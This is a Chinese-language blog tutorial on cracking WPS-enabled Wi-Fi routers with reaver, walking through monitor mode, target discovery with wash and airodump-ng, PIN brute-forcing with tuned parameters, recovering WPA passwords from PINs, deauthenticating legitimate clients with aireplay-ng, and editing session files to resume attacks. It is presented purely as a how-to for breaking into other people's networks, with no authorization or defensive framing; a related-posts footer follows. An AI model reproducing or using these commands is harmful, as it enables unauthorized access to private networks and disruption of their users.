reaver跑路由器pin码过程:(root权限下)

1 输入:airmon-ng start wlan0 开启监听模式

2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.

3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.

4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

reaver 参数详解:

-i, –interface= Name of the monitor-mode interface to use

网卡的监视接口,通常是mon0(必需)

-b, –bssid= BSSID of the target AP

AP的MAC地址(必需)

-c, –channel= Set the 802.11 channel for the interface (implies -f)

信号的频道,如果不指定会自动扫描,如-c1 指定1频道(常用)

-a, –auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数,自动检测目标AP最佳配置(常用)

-v, –verbose Display non-critical warnings (-vv for more)

显示不重要警告信息 -vv 可以显示更多(常用)

-S 使用最小的DH key,可以提高PJ速度(常用)

-t 即timeout每次穷举等待反馈的最长时间(常用)

-s, –session= Restore a previous session file

恢复进度文件

-N, –no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息

-n, –nack Target AP always sends a NACK [Auto]

对目标AP总是发送NACK,默认自动

-f, –fixed Disable channel hopping

禁止频道跳转

-p, –pin= Use the specified 4 or 8 digit WPS pin

使用指定的4位或者8位pin码,可以用8位直接找到密码(常用)

-d, –delay= Set the delay between pin attempts [1]

pin间延时,默认1秒(常用)

-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]

AP锁定WPS后等待时间

-g, –max-attempts= Quit after num pin attempts

最大pin次数

-q, –quiet Only display critical messages

只显示关键信息

-h, –help Show help

显示帮助

因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1

目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1

目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

常见问题的处理:

1.如果出现超长的WPA PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”

MAC为目标的mac地址,WPA PSK为获取到的超长密码。作用是将指定的pin码获取

wpa密码psk。

2.reaver -i mon0 -b MAC -p PIN8位数

直接由pin码得到psk密码

3.90.9%进程后出现问题或卡死,请记下PIN前四位数,重新跑后三位数,如果前四位正确的话

reaver -i mon0 -b MAC -p PIN前4位数

4.PIN僵死锁定后的方法。也可以攻击隐藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客户端的MAC 网卡端口

就是让客户端断开连接1000次macchanger

pin码的进度文件保存在/usr/local/etc/下,XXXXXXXXXXXX.wpc (MAC地址为文件名)

MAC.wpc结构

0                  //第一行,这个地方是说它的前4位PIN码的进度位置数

0                  //第二行,这个地方是说后3位PIN数的已经运行测试位置数

0                  //第三行,0时没有找到,当为1时找到前四位,当为2时全部找到.

1234

0123

1111

2222

3333

.......

.......

如我们要从2000开始pin,你可以将第一行修改为2004,这样它就会从2000开始PIN了.

命令是这样的  reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小写的-s后面跟进度文件的路径.

java跑pin码,reaver跑pin码wpc文件的修改相关推荐

  1. ubuntu14.04使用reaver跑pin码

    今天刚说过没找到支持ubuntu14.04用reaver跑pin的旧版库文件这就有摸索到方法了... 另外安装系统ubuntu14.04以及一系列破解工具比如aircrack,minidwep等都不在 ...

  2. Reaver跑pin码+Mdk3无线攻击笔记

    实例三-Reaver跑pin码破解wifi PIN码共分为8位,按 4 3 1分段,总共穷举有11000种组合.通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码. 容易碰 ...

  3. Pin码免跑包对应路由器

    Pin码免跑包对应路由器 MAC对应PIN码表(私藏分享) 有些朋友PJ出来的MAC和PIN有一些关系,基本上MAC前4位相同的,PIN码也相同,故做了以下工作 前4位指的是把MAC地址按" ...

  4. 恐龙快跑小程序对接流量主源码+前端 v5.0.4 全开源微擎框架

    简介: 恐龙快跑小程序对接流量主源码+前端 v5.0.4 全开源优点: 首页流量主赚取收益 用户冲分领奖品机制,冲到某个分数即可兑换相应奖品 用户游戏死亡后需要充值金币或者转发给好友获取金币复活. 盈 ...

  5. 阿里巴巴Java 开发手册 码出高效,码出质量 1.4.0

    前言 <阿里巴巴Java 开发手册>是阿里巴巴集团技术团队的集体智慧结晶和经验总结,经历了多次大规模一线实战的检验及不断完善,系统化地整理成册,回馈给广大开发者.现代软件行业的高速发展对开 ...

  6. Java开发编码规范手册--码出高效、码出质量

    参考与(阿里巴巴JAVA开发手册) 前言 现代软件行业的高速发展对开发者的综合素质要求越来越高,因为不仅是编程知识点,其它维度的知识点也会影响到软件的最终交付质量. 数据库的表结构和索引设计缺陷可能带 ...

  7. 深圳Java学习:怎么阅读spring源码?

    深圳Java学习:怎么阅读spring源码? 此问必是有心人,有心人必有心答. --题记 当我看到这个问题的时候,不禁心里一问,为何要阅读spring源码? 在我们的生活之中,有形形色色的万物(Obj ...

  8. java web学习项目20套源码完整版

    java web学习项目20套源码完整版 自己收集的各行各业的都有,这一套源码吃遍所有作业项目! 1.BBS论坛系统(jsp+sql) 2.ERP管理系统(jsp+servlet) 3.OA办公自动化 ...

  9. 企业级java springcloud b2bc商城系统开源源码二次开发-负载均衡策略...

    简单轮询负载均衡 以轮询的方式依次将请求调度不同的服务器,即每次调度执行i=(i+1) mod n 文章来源 JAVA ssm b2b2c多用户商城系统源码 随机负载均衡 随机选择状态为UP的serv ...

最新文章

  1. Android webview 加载https网页显示空白
  2. MyBatis中提示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL ser
  3. Java 如何将String转化为Int
  4. 技巧分享:如何利用CSS属性修改图片颜色?
  5. 14.并发容器之ConcurrentHashMap(JDK 1.8版本)
  6. 第11课 尼克与强盗 《小学生C++趣味编程》
  7. java JDBC 连接数据库查询数据与直接使用sql的疑问
  8. JavaSE----数组
  9. Eclipse-class文件中文乱码
  10. deepin efi 启动u盘_如何安装Deepin国产操作系统?只需一个U盘就够了,超简单
  11. 03.Java语言基础
  12. 一个被忽视的强大搜图技能——以图搜图
  13. python中eval和ast.literal_eval的区别
  14. 树莓派迅雷远程下载 | 树莓派小无相系列 1
  15. 电子科技大学计算机科学与技术考研复试,电子科技大学计算机科学与工程学院2021考研招生复试工作安排...
  16. Windows 10 离线安装.NET Framework 3.5(包括.NET 2.0和3.0)
  17. 后端 学习 前端 Vue 框架基础知识
  18. Day644.Spring框架开发双刃剑 -Java业务开发常见错误
  19. accept文件上传类型
  20. [Chromium中文文档]Chrom{e,ium}{,OS}中的硬件视频加速

热门文章

  1. 【Vue实践】列表搜索框中模糊搜索功能的两种实现方式
  2. 关于android 深度睡眠的认识
  3. 微信 jssdk的简单使用
  4. 华为网络篇 交换机对数据帧的处理-13
  5. 曲线积分与曲面积分的计算机应用,谈曲线积分与曲面积分的运算
  6. css变成块级元素_css块级元素
  7. 电脑销售进销存的软件清晰的结构流程
  8. 酷派可以刷android8吗,酷派锋尚MAX的手机系统是什么?能升级安卓5.0吗?
  9. Apache NiFi用户指南
  10. 手机web——自适应网页设计